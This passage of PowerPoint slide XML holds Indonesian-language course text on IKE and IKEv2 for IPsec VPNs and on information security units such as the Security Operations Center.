              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IPsec.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ada dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IKE. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-situs dan host-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-host dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. IKEv2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>populer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-situs yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EAP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server RADIUS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bandwidth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengorbankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjelajahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerjemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (NAT) dan MOBIKE multihoming. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelacakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> NAT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memudahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terowongan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh router/ firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Multihoming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ponsel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cerdas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IPsec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hidup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beralih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keduanya</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119</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="965290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Unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Informasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Unit-unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewakili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hirarki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Pusat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (SOC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Pusat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SOC) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjualan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagainya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Karena SOC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didirikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipelihara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibiayai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipekerjakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
